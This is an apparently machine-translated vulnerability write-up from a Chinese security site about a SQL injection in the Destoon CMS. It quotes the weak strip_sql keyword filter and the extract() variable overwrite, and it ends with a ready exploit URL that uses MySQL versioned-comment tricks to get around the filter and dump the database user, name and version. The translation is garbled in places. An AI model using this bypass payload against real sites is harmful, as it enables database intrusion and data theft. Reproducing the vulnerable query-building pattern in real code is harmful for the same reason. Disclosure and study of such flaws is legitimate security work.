Destoon the latest full version through the kill SQL injection vulnerability-vulnerability warning-the black bar safety net

2013-11-02T00:00:00
ID MYHACK58:62201341115
Type myhack58
Reporter 佚名
Modified 2013-11-02T00:00:00

Description

Author:Kavia

/common.inc.php 6 4 line:

if($_POST) $_POST = strip_sql($_POST); //strip_sql()filter

if($_GET) $_GET = strip_sql($_GET);

if($_COOKIE) $_COOKIE = strip_sql($_COOKIE);

.........

if($_POST) extract($_POST, EXTR_SKIP); //register variable

if($_GET) extract($_GET, EXTR_SKIP);

Follow strip_sql()

/include/global.func.php 1 8 6:

function strip_sql($string) {

$search = array("/union([[:space:]\/])/i","/select([[:space:]\/])/i","/update([[:space:]\/])/i","/replace([[:space:]\/])/i","/delete([[:space:]\/])/i","/drop([[:space:]\/])/i","/outfile([[: space:]\/])/i","/dumpfile([[:space:]\/])/i","/load_file\(/i","/substring\(/i","/ascii\(/i","/hex\(/i","/ord\(/i","/char\(/i");

$replace = array('union\\1','select\\1','update\\1','replace\\1','delete\\1','drop\\1','outfile\\1','dumpfile\\1','load_file(','substring(','ascii(','hex(','ord(','char(');

return is_array($string) ? array_map('strip_sql', $string) : preg_replace($search, $replace, $string);

}

Uses a new regular expression, before the West poison the release of the exp, has been unable to bypass the new version of the filter.

Here you can use the new bypass way:/! 5000union*/

First look for an injection point:

/module/member/record.inc.php 1 6 lines:

isset($mid) or $mid = 0;

isset($currency) or $currency = ";

$module_select = module_select('mid', $L['module_name'], $mid);

if($keyword) $condition .= "AND title LIKE '%$keyword%'";

if($fromtime) $condition .= "AND paytime>". (strtotime($fromtime.' 0 0:0 0:0 0'));

if($totime) $condition .= "AND paytime<". (strtotime($totime.' 2 3:5 9:5 9'));

if($mid) $condition .= "AND moduleid=$mid";

if($itemid) $condition .= "AND itemid=$itemid";

if($currency) $condition .= "AND currency='$currency'";

$r = $db->get_one("SELECT COUNT(*) AS num FROM {$DT_PRE}finance_pay WHERE $condition");//

$pages = pages($r['num'], $page, $pagesize);

$lists = array();

echo "SELECT * FROM {$DT_PRE}finance_pay WHERE $condition ORDER BY pid DESC LIMIT $offset,$pagesize";

$result = $db->query("SELECT * FROM {$DT_PRE}finance_pay WHERE $condition ORDER BY pid DESC LIMIT $offset,$pagesize");

Here the use of variables covered, you can successfully constructsql injection

/member/record.php

<? php

require 'config.inc.php';

require '../common.inc.php';

require DT_ROOT.'/ module/'.$ module.'/ record.inc.php';

?& gt;

引入 了 common.inc.php so there is a variable coverage. And can bypass the regular filtering. The end resultsql injection

exp: the http://demo.destoon.com/v5.0/member/record.php?action=pay&mid=-1/! 50000union//! 50000select/user(),2,database(),version(),5,6,7,8,9--